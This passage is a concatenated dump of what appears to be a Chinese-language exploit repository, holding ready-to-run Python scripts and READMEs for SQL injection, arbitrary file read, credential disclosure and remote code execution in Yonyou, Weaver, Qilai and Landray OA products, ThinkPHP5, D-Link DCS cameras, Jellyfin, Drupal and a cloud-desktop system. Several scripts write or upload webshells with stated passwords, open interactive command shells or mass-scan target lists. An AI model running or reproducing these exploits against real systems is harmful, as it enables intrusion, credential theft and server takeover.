``` 43 | python3 exp.py 44 | +------------------------------------------ 45 | + Version: 用友 U8 OA test.jsp SQL注入漏洞 46 | + 使用格式: python3 exp.py 47 | + url地址: http://xxx.xxx.xxx.xxx 48 | +------------------------------------------ 49 | 请输入需要检测的url:http://xxx.xxx.xxx.xxx 50 | [+]目标 http://xxx.xxx.xxx.xxx 存在漏洞 51 | [+] 响应地址: http://xxx.xxx.xxx.xxx/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1)) 52 | ``` 53 | #### 漏洞利用(getshell)脚本 54 | 55 | ``` 56 | ➜ 用友U8_OA_SQL注入 python3 getshell_exp.py 57 | +------------------------------------------ 58 | + Version: 用友 U8 OA test.jsp SQL注入漏洞 59 | + 使用格式: python3 getshell_exp.py 60 | + URL地址: http://xxx.xxx.xxx.xxx 61 | +------------------------------------------ 62 | 请输入需要检测的URL地址:http://xxx.xxx.xxx.xxx 63 | [+]目标 http://xxx.xxx.xxx.xxx 存在SQL注入漏洞 64 | [+]文件写入木马上传成功,上传路径为 http://xxx.xxx.xxx.xxx/yyoa/update_5.jsp 65 | [+]请使用冰蝎连接,密码为: bxmm 66 | ``` 67 | -------------------------------------------------------------------------------- /thinkphp5/tp5-getshell/README.md: -------------------------------------------------------------------------------- 1 | tp5-getshell.py - thinkphp5 rce漏洞检测工具 2 | == 3 | 4 | 5 | ----------------------- 6 | 7 | 8 | # 概述 9 | 10 | 11 | 控制器过滤不严导致rce,漏洞详情参考 12 | 13 | [thinkphp5 RCE漏洞重现及分析](http://www.lsablog.com/networksec/penetration/thinkphp5-rce-analysis/) 14 | 15 |
16 | 本工具支持单url/批量检测,有phpinfo模式、cmd shell模式、getshell(写一句话)模式,批量检测直接使用getshell模式。 17 | 18 |
19 | 20 | ----------------------- 21 | 22 | 23 | 24 | 25 | # 需求 26 | 27 | 28 | python2.7 29 | 30 |
31 | pip install -r requirements.txt 32 | 33 |
34 | 35 | ----------------------- 36 | 37 | 38 | 39 | # 快速开始 40 | 41 | 42 | python tp5-getshell.py -h
43 | 44 | ![](https://github.com/theLSA/tp5-getshell/raw/master/demo/p4.png)
45 |
46 | 单url检测(phpinfo模式)
47 | 48 | 使用4种poc-phpinfo检测
49 | 50 | python tp5-getshell.py -u http://www.xxx.com:8888/think5124/public/
51 | ![](https://github.com/theLSA/tp5-getshell/raw/master/demo/p3.png)
52 |
53 | 54 | 单url检测(getshell模式)
55 | 56 | 使用3种exp进行getshell,遇到先成功的exp就停止,防止重复getshell
57 | 58 | python tp5-getshell.py -u http://www.xxx.com:8888/think5124/public/ –exploit
59 | 60 | ![](https://github.com/theLSA/tp5-getshell/raw/master/demo/p2.png)
61 |
62 | 63 | 单url检测(cmd shell模式)
64 | 65 | python tp5-getshell.py -u http://www.xxx.com/ –cmdshell
66 | 67 | ![](https://github.com/theLSA/tp5-getshell/raw/master/demo/p1.png)
68 |
69 | 70 | 批量检测(getshell)
71 | 72 | 使用3种exp进行getshell,遇到先成功的exp就停止,防止重复getshell
73 | 74 | python tp5-getshell.py -f urls.txt -t 2 -s 10
75 | ![](https://github.com/theLSA/tp5-getshell/raw/master/demo/p0.png)
76 |
77 | 78 | ---------------------- 79 | 80 | # 反馈 81 | 82 | 博客: http://www.lsablog.com/
83 | gmail: lsasguge196@gmail.com
84 | qq: 2894400469@qq.com
85 | issues: https://github.com/theLSA/tp5-getshell/issues 86 | -------------------------------------------------------------------------------- /D-Link_DCS系列监控/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 8 | 9 | def title(): 10 | print('+------------------------------------------') 11 | print('+ \033[34mTitle: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078 \033[0m') 12 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 13 | print('+ \033[36mUrl: http://xxx.xxx.xxx.xxx \033[0m') 14 | print('+------------------------------------------') 15 | 16 | def POC_1(target_url): 17 | vuln_url = target_url + "/config/getuser?index=0" 18 | headers = { 19 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 20 | } 21 | try: 22 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 23 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 24 | print("\033[36m[+] 正在请求 {}/config/getuser?index=0 \033[0m".format(target_url)) 25 | if 'priv' in response.text and response.status_code == 200: 26 | res=response.text.strip() 27 | result=re.findall(r'(.*)\r\npriv',res,re.S) 28 | result=result[0] 29 | print("\033[36m[+] 获取用户名密码:\n{}\033[0m".format(result)) 30 | else: 31 | print("\033[31m[x] 请求失败 \033[0m") 32 | sys.exit(0) 33 | 34 | except Exception as e: 35 | print("\033[31m[x] 请求失败 \033[0m", e) 36 | 37 | 38 | 39 | if __name__ == '__main__': 40 | title() 41 | while True: 42 | target_url = str(input("\033[35m请输入需要检测的url:\033[0m")) 43 | target_url = target_url.strip() 44 | if len(target_url) != 0 and re.match(r'^https?:/{2}\w.+$', target_url): 45 | break 46 | POC_1(target_url) 47 | -------------------------------------------------------------------------------- 
/泛微OA/泛微OA_V8_SQL注入/weaverSQL_exp.py: -------------------------------------------------------------------------------- 1 | # 泛微OA V8 SQL注入获取管理员(sysadmin)MD5后的密码信息 2 | # fofa: app="泛微-协同办公OA" 3 | 4 | import requests 5 | import urllib3 6 | from multiprocessing import Pool 7 | urllib3.disable_warnings() 8 | 9 | def title(): 10 | print("[----------------------------------------- --------]") 11 | print("[------------ 泛微OA V8 SQL注入 ---------------]") 12 | print("[-------- usage:python3 weaverSQL_exp.py ------]") 13 | print("[------------------------------------------- ------]") 14 | 15 | headers = { 16 | 17 | "User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36" 18 | 19 | } 20 | 21 | def target_url(url): 22 | target_url = url + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager" 23 | try: 24 | res = requests.get(url=target_url,headers=headers,verify=False,timeout=10) 25 | if res.status_code == 200: 26 | print(f"\033[32m[+]目标系统: {url} 存在SQL注入!\033[0m") 27 | print("\033[32m[+] 正在查询sysadmin密码信息.......\033[0m") 28 | print(f"\033[32m[+]用户: sysadmin 密码MD5: {res.text.strip()}\033[0m") 29 | print("[---------------------------------------------------------------------]") 30 | with open('result.txt', 'a', encoding='utf8') as re: 31 | re.write("目标 {} 存在SQL注入\n用户名: sysadmin 密码MD5:{}\n\n".format(target_url,res.text.strip())) 32 | else: 33 | print(f"\033[31m[x]目标系统: {url} 不存在SQL注入!\033[0m") 34 | print("[---------------------------------------------------------------------]") 35 | except Exception as e: 36 | print(f"\033[31m[x]目标系统: {url} 存在未知错误!\033[0m\n",e) 37 | print("[---------------------------------------------------------------------]") 38 | 39 | 40 | if __name__ == "__main__": 41 | title() 42 | url = str(input("\033[35m请输入需要测试url地址: \033[0m")) 43 | target_url(url) 44 | 45 | 
-------------------------------------------------------------------------------- /启莱OA/启莱OA_treelist.aspx_SQL注入/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 6 | 7 | def title(): 8 | print('+------------------------------------------') 9 | print('+ \033[34mVersion: 启莱OA treelist.aspx SQL注入漏洞 \033[0m') 10 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 11 | print('+ \033[36murl地址: http://xxx.xxx.xxx.xxx \033[0m') 12 | print('+------------------------------------------') 13 | 14 | def POC_1(target_url): 15 | while True: 16 | sql = str(input("\033[35m请输入需要执行的sql语句:\033[0m")) 17 | if sql == "exit": 18 | break 19 | vuln_url = target_url + "/client/treelist.aspx?user=' and 1=("+sql+")--&pwd=1" 20 | headers = { 21 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 22 | } 23 | 24 | try: 25 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 26 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 27 | if "nvarchar" in response.text and response.status_code == 500: 28 | print("\033[32m[+]目标 {} 存在SQL注入漏洞\033[0m".format(target_url)) 29 | result = re.findall(r"在将 nvarchar 值 '"+"(.*)"+"' 转换", response.text) 30 | print("\033[32m[+]响应为: {}\033[0m".format(result)) 31 | else: 32 | print("\033[31m[x]目标 {} 不存在漏洞 \033[0m".format(target_url)) 33 | except Exception as e: 34 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(target_url)) 35 | 36 | if __name__ == '__main__': 37 | title() 38 | while True: 39 | target_url = str(input("\033[35m请输入需要检测的url:\033[0m")) 40 | if len(target_url) != 0 and re.match(r'^https?:/{2}\w.+$', target_url): 41 | break 42 | POC_1(target_url) 43 | -------------------------------------------------------------------------------- 
/泛微OA/ecology_test/ecology_scan.py: -------------------------------------------------------------------------------- 1 | import urllib3 2 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 3 | import requests, sys 4 | 5 | headers = { 6 | 'Content-Type': 'text/xml; charset=utf-8', 7 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 8 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0', 9 | 'Cache-Control': 'max-age=0', 10 | 'Content-Type': 'application/x-www-form-urlencoded', 11 | 'Upgrade-Insecure-Requests': '1', 12 | 'Content-Length': '578' 13 | } 14 | 15 | url_list = {'url_1':'/bsh.servlet.BshServlet', 'url_2':'/weaver/bsh.servlet.BshServlet', 'url_3':'/weaveroa/bsh.servlet.BshServlet', 'url_4':'/oa/bsh.servlet.BshServlet'} 16 | 17 | payload = {'poc_1':'bsh.script=exec("whoami");&bsh.servlet.output=raw', 'poc_2':'bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.output=raw', 'poc_3':r'bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\"command\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami'} 18 | 19 | result = 0 20 | 21 | def test(target): 22 | global result 23 | for url in url_list: 24 | test_url = target + url_list[url] 25 | for i in payload: 26 | try: 27 | rsp = requests.post(url=test_url, data=payload[i], headers=headers, verify=False, timeout=5) 28 | sta = rsp.status_code 29 | num = rsp.text 30 | if sta == 200 and len(num) < 50: 31 | print 'url is ' + test_url + ', payload can use ' + i + ', result is ' + num 32 | result = 1 33 | except Exception: 34 | pass 35 | if result == 0: 36 | print 'not exit!!!' 
37 | 38 | if __name__ == '__main__': 39 | print ''' 40 | -------------------------------------- 41 | BeanShell test script by LuckyEast >_< 42 | -------------------------------------- 43 | ''' 44 | target = sys.argv[1] 45 | test(target) 46 | # for line in open(sys.argv[1]).readlines(): 47 | # target=line.strip() 48 | # test(target) 49 | -------------------------------------------------------------------------------- /Jellyfin_任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 6 | 7 | def title(): 8 | print('+------------------------------------------') 9 | print('+ \033[34mVersion: Jellyfin < 10.7.1 \033[0m') 10 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 11 | print('+ \033[36mFile >>> ip.txt \033[0m') 12 | print('+------------------------------------------') 13 | 14 | def POC_1(target_url): 15 | vuln_url = target_url + "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" 16 | headers = { 17 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 18 | } 19 | try: 20 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 21 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=2) 22 | if response.status_code == 200 and "file" in response.text and "extension" in response.text and "font" in response.text: 23 | print("\033[32m[o] 目标 {} 存在漏洞(读取 windows/win.ini), 链接为:{} \033[0m".format(target_url, vuln_url)) 24 | else: 25 | print("\033[31m[x] 目标 {} 不存在漏洞 \033[0m".format(target_url)) 26 | except Exception as e: 27 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url)) 28 | 29 | def Scan(file_name): 30 | with open(file_name, "r", encoding='utf8') as scan_url: 31 | for url in scan_url: 32 | if url[:4] != "http": 33 | url = "https://" + 
url 34 | url = url.strip('\n') 35 | try: 36 | POC_1(url) 37 | 38 | except Exception as e: 39 | print("\033[31m[x] 请求报错 \033[0m".format(e)) 40 | continue 41 | 42 | if __name__ == '__main__': 43 | title() 44 | file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m")) 45 | Scan(file_name) 46 | -------------------------------------------------------------------------------- /泛微OA/RCE/e-cology-poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import argparse 3 | 4 | def verify(url,payload): 5 | #Furl=url+"/bshservlet/eval" #实验环境 6 | Furl=url+"/weaver/bsh.servlet.BshServle" 7 | with open("vlun_list.txt",'a') as vList: 8 | try: 9 | res = requests.post(Furl, data = payload) 10 | #print(res.text) 11 | if res.status_code == 200 : 12 | if "Error:" not in res.text: 13 | print(url + " is a vlun [Verify Success!]\n") 14 | #print(res.text) 15 | vList.write(url+'\n') 16 | else: 17 | print(url + "Verify Failed! not a vlun\n") 18 | else: 19 | print(str(res.status_code)+url+" Verify Failed! 
not a vlun \n") 20 | except Exception: 21 | raise Exception("Connet Failed!") 22 | 23 | 24 | 25 | def ecologyexp(urls,mode): 26 | payload={"bsh.script":"exec(\"whoami\")","bsh.servlet.output":"raw"} 27 | if mode == '1': 28 | verify(urls,payload) 29 | elif mode == '2': 30 | with open(urls) as uFile: 31 | for url in uFile.readlines(): 32 | try: 33 | verify(url,payload) 34 | except Exception as e: 35 | print(e) 36 | continue 37 | else: 38 | pass 39 | 40 | parser = argparse.ArgumentParser(description='e-cology verify',epilog="python e-cology-EXP.py -u url -m 1 || python e-cology-EXP.py -ul url.txt -m 2") 41 | parser.add_argument('--url', '-u', help='url 属性,需检测站点的url') 42 | parser.add_argument('--mode', '-m', help='mode 属性,单点检测||批量检测{1:url,2:urlList}', default='1') 43 | parser.add_argument('--urlList', '-ul', help='urlList 属性,url列表') 44 | parser.add_argument('--level', '-lv', help='level 属性,普通检测||高级检测{1:normal,2:pro}', default='1') 45 | args = parser.parse_args() 46 | 47 | 48 | 49 | if __name__ == '__main__': 50 | with open("vlun_list.txt",'w') as vF: 51 | vF.write("vlun_list\n") 52 | 53 | try: 54 | if args.urlList is not None: 55 | ecologyexp(args.urlList,args.mode) 56 | else: 57 | ecologyexp(args.url,args.mode) 58 | except Exception as e: 59 | print(e) 60 | -------------------------------------------------------------------------------- /Drupal/CVE-2019-6340/CVE-2019-6340.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import re 4 | 5 | # url = "http://47.75.157.227" 6 | url = sys.argv[1] 7 | url_dir = "/node/" 8 | vuln_url = url + url_dir 9 | print r''' 10 | ______ ________ ___ ____ _______ __________ __ __ ____ 11 | / ____/ | / / ____/ |__ \ / __ < / __ \ / ___/__ // // / / __ \ 12 | / / | | / / __/________/ // / / / / /_/ /_____/ __ \ /_ </ // /_/ / / / 13 | / /___ | |/ / /__/_____/ __// /_/ / /\__, /_____/ /_/ /__/ /__ __/ /_/ / 14 | \____/ |___/_____/ /____/\____/_//____/ \____/____/ /_/ 
\____/ 15 | 16 | 17 | Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340 18 | 19 | jas502n 20 | ''' 21 | print "\n\nExample: python CVE-2019-6340.py url cmd\n" 22 | print ">>>Vuln Url=%s" % vuln_url 23 | 24 | querystring = {"_format":"hal_json"} 25 | cmd = sys.argv[2] 26 | cmd_lenght = len(cmd) 27 | payload = "{\r\n \"link\": [\r\n {\r\n \"value\": \"link\",\r\n \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n }\r\n ],\r\n \"_links\": {\r\n \"type\": {\r\n \"href\": \"http://localhost/rest/type/shortcut/default\"\r\n }\r\n }\r\n}" % (cmd_lenght,cmd) 28 | 29 | headers = { 30 | 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", 31 | 'Connection': "close", 32 | 'Content-Type': "application/hal+json", 33 | 'Accept': "*/*", 34 | 'Cache-Control': "no-cache" 35 | } 36 | 37 | response = requests.request("POST", vuln_url, data=payload, headers=headers, params=querystring) 38 | # print(response.text) 39 | if response.status_code==403 and "u0027access" in response.text : 40 | print "\n>>>>Exit CVE-2019-6340 RCE Vuln!\n" 41 | m = re.findall('.*permissions."}(.*)',response.text,re.S) 42 | print m[0] 43 | 44 | else: 45 | print "No Vuln Exit!" 
46 | -------------------------------------------------------------------------------- /蓝凌OA/蓝凌OA_custom.jsp 任意文件读取漏洞/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | #-*- coding:utf-8 -*- 3 | 4 | import base64 5 | import requests 6 | import random 7 | import re 8 | import json 9 | import sys 10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 11 | 12 | def title(): 13 | print('+------------------------------------------') 14 | print('+ \033[34mVersion: 蓝凌OA 任意文件读取漏洞 \033[0m') 15 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 16 | print('+ \033[36mUrl: http://xxx.xxx.xxx.xxx \033[0m') 17 | print('+------------------------------------------') 18 | 19 | 20 | def get_ua(): 21 | first_num = random.randint(55, 62) 22 | third_num = random.randint(0, 3200) 23 | fourth_num = random.randint(0, 140) 24 | os_type = [ 25 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 26 | '(Macintosh; Intel Mac OS X 10_12_6)' 27 | ] 28 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 29 | 30 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 31 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 32 | ) 33 | return ua 34 | 35 | 36 | 37 | def POC_1(target_url): 38 | vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp" 39 | headers = { 40 | "User-Agent": get_ua(), 41 | "Content-Type": "application/x-www-form-urlencoded" 42 | } 43 | while True: 44 | filename = str(input("\033[35m请输入需要读取的文件根路径+文件名(如:/etc/passwd):\033[0m")) 45 | if filename == "exit": 46 | break 47 | data = 'var={"body":{"file":"file://'+filename+'"}}' 48 | try: 49 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 50 | response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10) 51 | print("\033[36m[+] 正在请求 {}/sys/ui/extend/varkind/custom.jsp \033[0m".format(target_url)) 52 | if "root:" in response.text and 
response.status_code == 200: 53 | print("\033[36m[+] 成功读取"+filename+"\n[+] 响应为:{} \033[0m".format(response.text)) 54 | except Exception as e: 55 | print("\033[31m[x] 请求失败:{} \033[0m".format(e)) 56 | 57 | if __name__ == '__main__': 58 | title() 59 | while True: 60 | target_url = str(input("\033[35m请输入需要检测的url:\033[0m")) 61 | if target_url == "exit": 62 | break 63 | POC_1(target_url) 64 | -------------------------------------------------------------------------------- /Drupal/CVE-2018-7600-Drupal7/CVE-2018-7600-Drupal7-EXP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | ''' 5 | ____ _ _ _ _ __ __ _ 6 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 7 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 8 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 9 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 10 | ''' 11 | 12 | import re 13 | import requests 14 | from multiprocessing import Pool, Manager 15 | 16 | headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",} 17 | 18 | def saveinfo(result): 19 | if result: 20 | fw=open('result.txt','a') 21 | fw.write(result+'\n') 22 | fw.close() 23 | 24 | def poc(target,q): 25 | print('加载目标:'+target) 26 | requests.packages.urllib3.disable_warnings() 27 | get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#type]':'markup', 'name[#markup]': 'whoami'} 28 | post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'} 29 | try: 30 | r = requests.post(target, params=get_params, data=post_params, verify=False,allow_redirects=False) 31 | rule1 = re.compile(r'<input type="hidden" name="form_build_id" value="(.*?)" />') 32 | form_build_id = rule1.findall(r.text) 33 | if form_build_id: 34 | get_params = {'q':'file/ajax/name/#value/' + form_build_id[0]} 35 | post_params = 
{'form_build_id':form_build_id[0]} 36 | r = requests.post(target, params=get_params, data=post_params, verify=False) 37 | rule2 = re.compile(r'(.*?)\[{"command":"settings","settings":.*?') 38 | parsed_result=rule2.findall(r.text.replace('\n','').replace(' ','').replace('\r','').replace('\t','')) 39 | if parsed_result and len(parsed_result[0])>0: 40 | print(("Found a vulnerable target:"+target+"\tPermissions of the current user is:"+parsed_result[0])) 41 | return ("Found a vulnerable target:"+target+"\tPermissions of the current user is:"+parsed_result[0]) 42 | except: 43 | pass 44 | q.put(target) 45 | 46 | 47 | def poolmana(): 48 | p = Pool(30) 49 | q = Manager().Queue() 50 | fr = open('target.txt', 'r') 51 | ips=fr.readlines() 52 | fr.close() 53 | for i in ips: 54 | i=i.replace('\n','') 55 | p.apply_async(poc, args=(i, q,),callback=saveinfo) 56 | p.close() 57 | p.join() 58 | 59 | def run(): 60 | poolmana() 61 | 62 | 63 | if __name__ == '__main__': 64 | run() 65 | -------------------------------------------------------------------------------- /泛微OA/ecology_test/Weaver-Ecology-OA_RCE-EXP.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | #coding:utf-8 3 | #Author:Ja0k 4 | #For Weaver-Ecology-OA_RCE 5 | 6 | import urllib3 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | import requests,sys 10 | 11 | headers = { 12 | 'Content-Type': 'text/xml; charset=utf-8', 13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0', 15 | 'Cache-Control': 'max-age=0', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | 'Upgrade-Insecure-Requests': '1', 18 | 'Content-Length': '578' 19 | } 20 | 21 | proxies= {'http':'http://127.0.0.1:8080'} 22 | 23 | def Poc_check(target): 24 | 25 | Url_Payload1="/bsh.servlet.BshServlet" 26 | 
Url_Payload2="/weaver/bsh.servlet.BshServlet" 27 | Url_Payload3="/weaveroa/bsh.servlet.BshServlet" 28 | Url_Payload4="/oa/bsh.servlet.BshServlet" 29 | 30 | Data_Payload1="""bsh.script=exec("whoami");&bsh.servlet.output=raw""" 31 | Data_Payload2= """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw""" 32 | Data_Payload3= """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami""" 33 | for Url_Payload in (Url_Payload1,Url_Payload2,Url_Payload3,Url_Payload4): 34 | url= target + Url_Payload 35 | for Data_payload in (Data_Payload1,Data_Payload2,Data_Payload3): 36 | try: 37 | http_response = requests.post(url,data=Data_payload,headers=headers,verify=False) 38 | #print http_response.status_code 39 | if http_response.status_code == 200: 40 | if ";</script>" not in (http_response.content): 41 | if "Login.jsp" not in (http_response.content): 42 | if "Error" not in (http_response.content): 43 | print "{0} is a E-cologyOA_RCE Vulnerability".format(url) 44 | print "Server Current Username:{0}".format(http_response.content) 45 | elif http_response.status_code == 500: 46 | print "{0}500 maybe is Weaver-EcologyOA,Please confirm by yourself ".format(url) 47 | else: 48 | pass 49 | except Exception,Error: 50 | pass 51 | 52 | if __name__ == '__main__': 53 | for line in open(sys.argv[1]).readlines(): 54 | target=line.strip() 55 | Poc_check(target) 56 | -------------------------------------------------------------------------------- /thinkphp5/thinkphp5_rce/tp5_rce.py: -------------------------------------------------------------------------------- 1 | # /usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | import sys 5 | import requests 6 | 7 | reload(sys) 8 | sys.setdefaultencoding('utf-8') 9 | 10 | def test(url): 11 | payload = ['',r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1", 12 | 
r"/?s=index/\think\Request/input&filter=phpinfo&data=1", 13 | r"/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1", 14 | r"/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E", 15 | r"/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E"] 16 | 17 | for i in range(1,6): 18 | url += payload[i] 19 | #print url 20 | try: 21 | r = requests.get(url,verify=False) 22 | if 'PHP Version' in r.text: 23 | return i 24 | else: 25 | return False 26 | except: 27 | print '[!] Destination address cannot be connected' 28 | return False 29 | 30 | def exp(u,i): 31 | payload = ['',r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=", 32 | r"/?s=index/\think\Request/input&filter=system&data=", 33 | r"/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=", 34 | r"/?s=index/\think\template\driver\file/write&cacheFile=fh.php&content=%3C?php @eval($_GET['fuhei']);?%3E", 35 | r"/?s=index/\think\view\driver\Php/display&content=%3C?php @eval($_GET['fuhei']);?%3E"] 36 | while(1): 37 | url = u 38 | command = raw_input("fuhei@tp5_shell$ ") 39 | if command != "exit" and i < 4: 40 | payload1 = payload[i]+str(command) 41 | url += payload1 42 | r = requests.get(url) 43 | print r.text 44 | elif command != "exit" and i == 4: 45 | uu = u+payload[4] 46 | requests.get(uu) 47 | payload2 = "/fh.php?fuhei=system('"+str(command)+"');" 48 | url += payload2 49 | #print url 50 | r = requests.get(url) 51 | print r.text 52 | elif command != "exit" and i == 5: 53 | payload3 += payload[5]+"&fuhei=system('"+str(command)+"');" 54 | url += payload3 55 | r = requests.get(url) 56 | print r.text 57 | else: 58 | break 59 | 60 | if __name__ == '__main__': 61 | url = sys.argv[1] 62 | i = test(url) 63 | if i: 64 | print "[+] Remote code execution vulnerability exists at the target address" 65 | exp(url,i) 66 | else: 67 | print 
"[-] There is no remote code execution vulnerability in the target address" 68 | -------------------------------------------------------------------------------- /和信创天云桌面系统/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import base64 5 | import re 6 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 7 | 8 | def title(): 9 | print('+------------------------------------------') 10 | print('+ \033[34mVersion: 和信云桌面任意文件上传漏洞 \033[0m') 11 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 12 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 13 | print('+------------------------------------------') 14 | 15 | def POC_1(target_url): 16 | vuln_url = target_url + "/Upload/upload_file.php?l=test" 17 | headers = { 18 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", 19 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv" 20 | } 21 | data = base64.b64decode("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") 22 | try: 23 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 24 | response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5) 25 | if "Requst" in response.text and response.status_code == 200: 26 | webshell_url = target_url + "/Upload/test/config.php" 27 | response = requests.get(url=webshell_url, headers=headers,verify=False, timeout=5) 28 | if "shell" in response.text and response.status_code == 200: 29 | print("\033[32m[o] 目标 {}存在漏洞 ,成功上传冰蝎木马 config.php\n[o] 路径为 {}/Upload/test/config.php\033[0m".format(target_url, target_url)) 30 | print("\033[32m[o] 密码为: rebeyond \033[0m") 31 | else: 32 | print("\033[31m[x] 请求失败 \033[0m") 33 | sys.exit(0) 34 | else: 35 | print("\033[31m[x] 上传失败 \033[0m") 36 | except Exception as e: 37 | print("\033[31m[x] 请求失败 \033[0m", e) 38 | 39 | 40 | if __name__ == '__main__': 41 | 
